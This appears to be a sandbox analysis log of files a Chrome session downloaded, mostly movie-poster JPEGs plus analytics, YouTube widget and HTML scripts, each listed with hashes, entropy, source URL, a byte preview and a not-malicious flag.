                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):26188
                                                                                                                                                                                          Entropy (8bit):7.965446842864317
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:GSVDu+RAyXMLOMT8iaMuj5lcGFD4r1BoNXIjgq3xbl:3KaMLVTGMujYu8r184Xl
                                                                                                                                                                                          MD5:31882B97CFCC47A04A2747C091FE2738
                                                                                                                                                                                          SHA1:7AD02C075000150A78EC73DAE85C53E04512F8F3
                                                                                                                                                                                          SHA-256:4860D87BB167707FA1C451E8F6C0F42E8147D47ACE37572A0E8C446965ACD3F9
                                                                                                                                                                                          SHA-512:C530DA4012DD4B7DA18284CD11C512603969BCA084AE07942708C7B9F75DD503D6215DA74E9B1EF577200F0A7BA20CE810E415A33B6E78A8012ED7925B469A66
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BZjc1OTI1N2QtYzY4OC00YzM0LWEyNWYtZWEyOTMxNTE4Yjk3XkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4............................................................................>A.......`........>.|,s>?..i{j.Y[q.m.E..._V;..caS..*..i.......mi....`..U@6.J..~u..U.+M..@.u.......m.....I..i.[..R..../a..G....\T.....4D.O[.m0LY.e....0.>_Q@...N..Z.*EZ..;.....7.h`|~.......b.P.J5.]....v).,,.J.@Im.h..~.U.y...e@.....~j_.....i-i.=..y.gG5E.....Z.kf)..m."R.e#....5..2+....`.......2.FMl....0.%+...+.9..!J.+boH.V!....T................}..Cy..q&.92.:..........|...O-.<Vvmz{az.ZZ..QW. "..... ......1....$Zd.+[*.O8s...Ku...GJ....?5S~......../.............9........jf..:.........yPx.9c..:.R..O(o.o.D..V...............l.......;.}?....r''fg\9.....o.6.....kaO.;...+Z..j............Z^u[l.wV..7.q.'A..bc.u...zV..S...0.=..n..........1[.[.uC........v.y......>.r.bT.=:../.....M.........NU.A...mVvN6..W..g....g
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):52916
                                                                                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x455, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):34829
                                                                                                                                                                                          Entropy (8bit):7.978840380575049
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:vzKIN5kBN0V3CywfgArvEI2cTx2NXHXXGGIaGaVpIBwSnkvo:vzKIkBqV3r0rsI2cTx2NXHQaGaVpIPnH
                                                                                                                                                                                          MD5:2F5E3CD015852407478BD6715B79EA18
                                                                                                                                                                                          SHA1:86F81BB15B2450E437314C671219AFDDE532C733
                                                                                                                                                                                          SHA-256:A31C62BF11ACAD1A00A91F996BDE04CAF3B4CE12994FC2D5BFDDFB05BA190179
                                                                                                                                                                                          SHA-512:A27C631066AA1F0983261F1D3DD3A78075A5245C0517CCF41F15992F5BDA96039FC8043B34F206955A323606BA14B6124450FC8F07E834EE214A647A2A36A7AD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BMDVkMWVmMjYtNjE3YS00YWIxLWE5MDgtMWUzMTIyYWJhMzA1XkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................@...................y../..........N..9{)...F............J.._.F>M4..X{0.../A.3$.8........#...........h..]bU..#...#.w..6_tY&..1.$8z.......9.qc.DS...............X.Y...H...f{...-.n4..5.....f..j.N.m..=..P..]..'...........?.t..u.....f.F?..r.{h....e.k.r......h..[#/.=.Bd..._.....s.u...9.`..>...............W.v~?..4.l.l}.3.r.f.xr.A.....m......C.?;...h..\.k.$..'......./g...f<...q....>p............B.....kq..r.v.~....m..-VJs._....}.#~...0..2.E..w.?..M6..m.]?...G......8*....%x.Y.xo.{Z..V%.W#.f..N.W.`.6yf.'dV..n..9.W.~....<....x..i.d..p.?.......xW............w.ys.-..+..t...5LC....f.v......T.........S.Z.4.....-O....'-.z.......p.y..?.....G..../]..n... &......TF......C.yn.t}|.Ckk.).]..-.L_.z..n.{z|o.;2...L..m...3~...+;2&...usX,
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x444, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):12855
                                                                                                                                                                                          Entropy (8bit):7.9469378528258465
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:hhtCVgHGNZBgDyY3QVXHehgtG7t6brneJsOaN:3tMgH3yY3gXHeqscbrnF9N
                                                                                                                                                                                          MD5:267C8E63D7ED98F6BC89D135367A846E
                                                                                                                                                                                          SHA1:C092892E10EBB0596A2DEC12B7636AF2A37DB173
                                                                                                                                                                                          SHA-256:4E550704B244C79A5E8BA161102F0A644556D12ABB9B086022411D24D042AD29
                                                                                                                                                                                          SHA-512:3AE37829207E8FB32C2FA37AF8DD3AE3B7726A5D2EF3F3FC1CA41E6BD0E4AEDB23E5E09E7BE93E944676A9DBCCD77F81F4B24987B0D542A19410B73718917950
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BNTBmZWJkNjctNDhiNC00MGE2LWEwOTctZTk5OGVhMWMyNmVhXkEyXkFqcGdeQXVyMTMxODk2OTU@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4..................................................................f.g....7,)....a.G.%.....U...!,e.H..(c.J....h.O...Q...U....*...Y.a .}9,...o{a..XGS.....J.@#.(.....h.o7..qb,.\G]]E\Yn.O..%.U...H.......f.wy+|..+.f...*.o...:VPl/*...VY..KR#A0....^.'V.t..*}5>z././F....Y...2.....[...l...0:."....@8)"G..(.S.J;.Y..1. .e.v..X2...:.).c.U[,.J.p.f!........7-I.{....J....J(..a..JKY.K#......a...kE.iU..i<.$.,.P....Y..P..rc.<..dt......0.&...(F*.....c,...7..d.q..WYW..Q...A'.fDFX..`6...?L.[..B.n.P.'x{0....u....Tx.U.9.}..c..7q....T....]y...f.[.O........5.....O%.....n+.p.NC.A.......a#...:S......U.S^.).\.4jp..+_.-.#w.t.h=7...u".y{.)[..KW.f..eu.itSuR...r8.g}-...;.f.y...%.a...c...2A\"(..(.....KS.(D....m.E.M...B....L..u..$.o..Z....l%......H#...8D@..-.+..).a..8..........e.m1U+..gAGR,..L@2...Q.W..FGKp..kq........%
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x450, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):37570
                                                                                                                                                                                          Entropy (8bit):7.980636652599478
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:oW5P2GifYoiUj1uk4ZV2/r2cfBILf9yrtFtSHoVbXFbqRkC7:75P1iflBuk4ZNwIAl4Rj7
                                                                                                                                                                                          MD5:C02AF16719AE80F8E5FDE7A04F9D4C81
                                                                                                                                                                                          SHA1:5D90A31F4FBCAC12075280460502B6925FC10995
                                                                                                                                                                                          SHA-256:89E91E822B640F9522E6DBB577B19F8493735FDFE40CD689CDD361342B9AAE9B
                                                                                                                                                                                          SHA-512:AE2183E128BBA70D85E235A08BFC6CFC12CBE7106C452DC7F45099C0D94380386047FD6D028B4C163DDAE931A9FD10F9AF08975F4F8E0E7E21E287EDA6E4AC10
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://images.fsharetv.co/ysyyscafvj.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}........,.."..........6....................................................................#.{.d%.E.x......}5.~.5,.>.....F...t.o..kK.>$..4.O%fH.L.+5........;EJ9.......^}-....1.....I.I'U.ga%./....>o.v...:NW5..........3...P.......6.O..{.!....|....|.R.[z.`../.m.M.o...'&..t:..EI..{..3..... A.}e*..3d..uo......Z.v`..F.jl.j&..A..f.......-..n.....c.s.7..Z)n......U...#d...k..o ....E.B.pjS:>.W~...R1@oly..O<..?Y1.U.U.-H...1...i=e.}.{...o.SR..Rh.fn...Q.;a..b..U.!.3.g.)..l+/.N...Q=.k...G.~...>g./l./..Z.FO...t.u.L:...)*.&......m..I..K2....Am.}e..Q.....j..7....N]......T.r....s.........l.U"H...+.{Jg......1^.(e...;.r..gS...!hW..~.........?k.m..s.2.....y.N..Zm".........(4......<5..OS...O}.C^.\[...|n.[".......r.YP....NY.M..>......k.r..e-_.~..6h..c..n.f.A.....2.&....7.S..(>-~7....W...G-.B../N.\l.z..:...|
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x421, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):42582
                                                                                                                                                                                          Entropy (8bit):7.98606820467653
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:QqUQKjCfppwr+Ut04gcxRprx789OXxHFQnJrG0fp6+9nU3wUjhET3Qt4qly:qQKefppktLrA8ZFQnk0fkSj8I3Qtxy
                                                                                                                                                                                          MD5:710DF84299114D8A6B5309502AE26036
                                                                                                                                                                                          SHA1:656038B4412331DF7BD1EAF00D1A1EEA827A2C8D
                                                                                                                                                                                          SHA-256:62D0599D014AB2173E07149694B911F14C86B7BCCF69FEDCFEC1310CFB00F82E
                                                                                                                                                                                          SHA-512:371CC052E2BD228D52B618AFD4B58E67A30A840C6A60014ECF8184596C3C553DC2BBBD49E866CC5D0AEC24BC8B57CC40097345D65E25ABBE61BCA5F715E5BD22
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5..................................................................k..8..&..J.8.$.....-S.K....m.A..Gq".....i.?a7.k.5Z.o9ts.p/...?........`Il.@..Ce."...[...]S...+..<...zg.'..zl~.a.j..R.L...^..a...e.5.9V../48..[...Py|......=t.,P,.#7/....?...'.n.O....W0........M}.v........$.bh..T....G....i...7......?.H]s..[[.8..x...:..[..[=..:.*a...D...o...Q.....%K..T.....O...S...}..6.G...M.z."...Ty..T...EZ:..@.h..J.Xj...LWW.>. D.*.....\....2.\.%.....j.No..Cn......2.y.jM~.x.&.$...4.i.&.\G{..*T....u...w.R,I`.c..Uc..ME.......i.h...S...-.6..`..Y.7b.[.q_.........y..W...0.4<.9..Ae1....v.%....t......Xxe.6.._f..BuW..........CxI..^.Q..FZ...u.......d.hc^i.dV.?Z..Qio.."J.,U..DL.....V...Ob...z.M\.../..E..Y.+.6..\...,.X.lu.&?@..l..`.s...A...ny...}!..r......b._...#.i*.<.n.....:.I#.{..Xk...X.e.....A.+3....u<..
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (65083)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1124367
                                                                                                                                                                                          Entropy (8bit):6.178913915547135
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:nD/05KpIlSoG82lvQyeK7RleU6j2a4t56pj/Y3mfy+NhysLZCZ4jPt7:D/05KpCGatzVhynZ4p7
                                                                                                                                                                                          MD5:C0F9E48AB8AA6F36D83A00027AB30686
                                                                                                                                                                                          SHA1:2B88BA7FE59F8455F67D530BEECB0CB317407C3E
                                                                                                                                                                                          SHA-256:331A963229C6705BA989493E17ED8649CF9F2BFF3ED087201E92B0F93582EC63
                                                                                                                                                                                          SHA-512:EAFCB0416B66C3DCE8E778E129A8F2AFA316FDFBD99E6DBED82C16596D9CE0467FA229BDEF5D7A6860DAB596E983792834B071B4E4FCA0D90B47051966CA6A35
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Title</title>. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <meta name="referrer" content="no-referrer">.. <script src="./service_worker.js"></script>.. <style>. /*!. * Bootstrap v3.4.1 (https://getbootstrap.com/). * Copyright 2011-2019 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:none;text-decoration:underline;-w
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x434, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):27557
                                                                                                                                                                                          Entropy (8bit):7.982825787449362
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:VOzIoB3azs8Ps2BK5E6/icfZrnMTyOx2JdXr:VNgELsGKW6/ffZATyhXr
                                                                                                                                                                                          MD5:069D27B6811E16DB903356669135D09C
                                                                                                                                                                                          SHA1:B07816C24DC48AE43655561824C754C9132BAE08
                                                                                                                                                                                          SHA-256:C7FA4D24FEE92ECA0B217D41509EABB0B4453234D00997E6205E33937D398608
                                                                                                                                                                                          SHA-512:C51C22EE85BE27E6BC2921E2C8CD9D053B92E067A33D3234ABC6D0593A47462099F81BE81A764330DC16CDB62EAD7CBFAD734DFAC58AB883CEEB8AD595647019
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........6......................................................................WDM...o......,......B.(..!oc...........J.].n.<...`o<.1..s..j..sd.qUwU...J..s\\....+X.k[;...f..6V......z~^..w...h....S.....A....g^...n..j..b.....W.n...a.R.j.;...-...{.F.xk. .0V..0..z.....5....?..6...V.k.......?.n4.GSus.i...>}...L:...|...,..n.....i.............../+G.....8z....$u...7......z"..3.....v..>X.~.]CJ8.R.GD.....1[.....Y$j[....U..A.I....>q....w.w}y\...5Wu.'l.........7../.Vh..h.A@.........O.O/.....p..6.....z]&,<.EJ;....fM..a..^c...WR..m.v.C^)....b.1....(...H....`&.s.R3..=....3..g.....5.....YuEcG.-o.C.r.q..J.y}[Ze;.K}!.[R...;rs..Qg....|..vx..9..DpWyp2.........5...PF^..r..k....g...c-ZF.@....g........_....@.:...^.#.p...l...7.E..Ly..E.F.bV. j.).L.....j........E...x.m.[F.E.g.w4.cO.{.:?..../ZZ....z..
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x456, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):35465
                                                                                                                                                                                          Entropy (8bit):7.9854419712297995
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:+kcXLpxIcW6HEFnGHfJeEkRAZgEKeJd7/pFsaXcOdncQ/:07pxQFnI2RSFJd7/gaXtdncQ/
                                                                                                                                                                                          MD5:F3B42AD161A0E9972E8E680C8A15E387
                                                                                                                                                                                          SHA1:ACF33BC07EA573DC40BAD129AE126CFC5475CC41
                                                                                                                                                                                          SHA-256:8BC4F94B97E4DBCD6E2CC8EE90513CD39791F26D186B0608F9BB7079BEFAC086
                                                                                                                                                                                          SHA-512:DF0CC1F37380E5EC40C549705EA8BE8C7F48A167BB7B94A0B1DD63CE9AF4FDEF9B0BD0A8E9535D00BA019D96497BB85D764D1B7CE0469B55060F6FD582E6F800
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BOGEyZjQzMWUtNzE4Zi00Y2NhLWFkYzctNGZiNTQzY2VmYjBlXkEyXkFqcGc@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........5.......................................................................v@......I.I.'A...:d.$...3.&H.H<.........L.;..L.............&F..<....SS..%._.&..$.......$.y.......x..3;"}?.!$...:.e.ao..m........s./..q"..h.U.....5X...9g.*.....v%3.......$.$NT...%..%..YUkKT..>.q.@.../(.3.bp...Fz$.Y.A.!.....z...VvXb.P.)rC...%.@..O.Ma...s'f.3`....._.=......L.0.w......@...X.b...$....Uq.U...$.q.3.eT^.a.c.&#..._$.03.1KRy..lR...cB^.hN.<....E.S.._y.....x~-...U(.~g].ot.5EVk...:@Z..bV...n.g..4..N..2T.x.<...>.c...f..Fg_?..m.....<...e.(r9\RU.ZBS...o..]....Akl.....:`.x.;..^.y.A.n..B...D......&.9]Q.m}.+........^6|...)+sY.Xk..3.2'^.\....N)...kH.u..xx.".7...M/.b..t..z.I$..xD..!:#.H..`H.....3..@!..e..O..H...#.0rG.?......;z5r..NP)..~o]*...8.|.vWf.f....d.....wl0..-..@:..n4i.u.........$i.....xl.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x467, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):32839
                                                                                                                                                                                          Entropy (8bit):7.979173664116706
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:Iu86c4NfQJor19mRlAE/noDgl1lixMWtaWy:Iu86c4GWolAYoDg1iaWy
                                                                                                                                                                                          MD5:B1239202296861AB3D4930F1ABA5D63F
                                                                                                                                                                                          SHA1:59613FA6DD0DB7DEE9C370077D316175995B0CE4
                                                                                                                                                                                          SHA-256:E515749A3EA0B83A0DCBD909F0F3CB920395D37628D4D4ECD1793731862D613D
                                                                                                                                                                                          SHA-512:4AD8D56FF63A7192CE1DEB789B4E1FDA573246FAC3A6E662CBB4F1DEA66316401C383F36E72FD116BBA2008A9BDD21C09691A4F096A7220529462423F5D643B3
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BZTYyMWUyOTQtM2VlNS00YTA4LWI0YTgtODg1ZDg5ZDQzYWI5XkEyXkFqcGdeQXVyNzc5MjA3OA@@._V1_SX300.jpg
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........4.....................................................................`/u..-.~..3.<...z3....l.X.(...5...^........5.L.x........Z6...F....5.......[...[\x...Q.f.?...-...8...."..O7W.J....h.C.0......A.Y1YF.(|..qB..V{b.mHQ.....|r.._,..e...._l.:..(>........_.h...3........@....l...'.T#..^......G......Z.f&..r.V_..0...p..}+.L.e....Br.z9..d....+.NJ.p>w..1.9.B!.:`.V...dq..H.=I.b_.....Wg..U..z..r...N.....K....)......c.6..'.F.s..m.....[.?.T..\...d.....g6..6..<..tV..^.9F.T..~...f.8.....2.l5.....!..N......0..,ba .".Sz(.).....n.....,i..SS:<.jA......-V.r.O..c8.B.+..........9K.l..H....\G..\ze.5..Q.>LD2...b.]..x@.9t...z...2d...$O.P&.XX....C.fo(.....Wj....j.-j...#IP.~...w.H...82v.J...a].NxA.l........r..T...SRV.".yb=..&..U..........{e=m^}s.4^.g......}."..a..=......%."/%.H.%.".o......R.H./.C.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x419, components 3
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):25107
                                                                                                                                                                                          Entropy (8bit):7.975739417448378
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:mPZKaAYQfR80TQI2NUABUod3owyHjdTMp3BLm9c4C2l8Tr:PIQfm1HymYrdT63ShC2l8n
                                                                                                                                                                                          MD5:AE718CF811C83FAAA73C6577F902DE3A
                                                                                                                                                                                          SHA1:6B4628B681620A79D044A43A94FADB29303C92DE
                                                                                                                                                                                          SHA-256:8BF183294CC697E064FDC47A326E6619680D8F98D34FC16B35A632859553BAEA
                                                                                                                                                                                          SHA-512:0B94C0B39FADD67634C1188B4D574BEA53D82B23D95FDDF99489DBB7EA39D6604FEA4CCCA341F69C15CE8DFC74A193554644B3DFD107E9EE2D1FEF5B175A78E4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........,.."..........3.................................................................g.\....JU.0...|..E.....~m..rt.S!D..8e!@.%.xJR.N.F5h.#..T.7al...........6.M...43.Uouq..V...].jV^..y...6.._..~~......e..`....2.$....w...s.ta@..5..y.......h....qy^[......0..PQQ....|.ZK(..'.>i...6.X.0..+...\......l.~....'j .......|.../s=,...=...pz...V..c..P.O...m..:N...v....mo._DH.......l....3.|.K.?.....N.}.V=x.o.7;..4.).7..v...q.{.k.`).^.~....}i)/NM.yvq..|..wg.A...k..Z..a)....2s..C\.Gm.\....].6..;V...<...+...6.!P=..K:k.N.....rl..)..y...-.n...;.u..Kj0.._..9..8~S.....+.....tM.!...J..9{n.8...py..z..G.....f.j....9i......4....9.s-.W..Chk.m..}\_l.H...S.>*...e.s:o...N.h&..|.F.........a...D.\.E......q..g......MWv.U....[...x....#8.o......U..St...{.%z..C..z,R..O..z.Y.p.?.......l.....?o..c]cu..k%^Ql..zou.l.c..-.
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (561)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):30884
                                                                                                                                                                                          Entropy (8bit):5.396878850736056
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:4o63kjilKDknpjTqty5qTWZhuHjiyBMAtmN4C4SYCG3EzZYBFS/+0O/txrncOnk5:Utlrpgy5GZHm4C4N10kv0O/zrYe1M
                                                                                                                                                                                          MD5:32C99FE6533A025BDB08BDE87A9B4F6E
                                                                                                                                                                                          SHA1:F1B48F220F4B4B81CCDBB1A9289B821A66CFA1D3
                                                                                                                                                                                          SHA-256:14939503C8A97BEF459CE94218F0E65933AB569F7B1D726BCB0B3C1031EBCCF9
                                                                                                                                                                                          SHA-512:8D454CC89659899B923B9467FD1F488F0DEA432D4FDAEDB59FAA83C29D4FEDD045AA445BE34D094103E4D81BD4773B61F926C381F14FC7388E34D89D51F4582D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://www.youtube.com/s/player/f8f53e1a/www-widgetapi.vflset/www-widgetapi.js
                                                                                                                                                                                          Preview:(function(){'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var r=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var t=da(this);function u(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var g=a[d];if(!(g in c))break a;c=c[g]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&r(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(k){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(k||"")+"_"+g++,k)}.function c(k,e){this.g=k;r(this,"description",{configurable:!0,writable:!0,value:e
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 300x469, components 3
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):39875
                                                                                                                                                                                          Entropy (8bit):7.985725624743293
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:ypXxRiQAg7hwuDZBJjf4EG6ZMpBowHJL5q6uwRuSDJUonz:SXxR/wuDZzjgEGVHGqFtnz
                                                                                                                                                                                          MD5:03546E355FB71C4A65CFAA35BCE5E8DB
                                                                                                                                                                                          SHA1:4CE5238E34E10EF00896DAB1DD14EA2043630A10
                                                                                                                                                                                          SHA-256:BB73B74111725F776516C5D9F3452ED10CB6EA8687E23838EC7C37BB92292A8D
                                                                                                                                                                                          SHA-512:08EA5E3C714CBD90CD2CC049A7FD10E9D911DDE5D3550EAAA0FDFD1885073216BBA5FE6F26E3AE923BEC3ACDB6A4AA5A4133673005126687EEEA226BFDFCC04A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          URL:https://m.media-amazon.com/images/M/MV5BZWQ3NWI5NDYtMGNiZS00MTNhLTk4ODItNWM2NTcyNjFiMTljL2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg
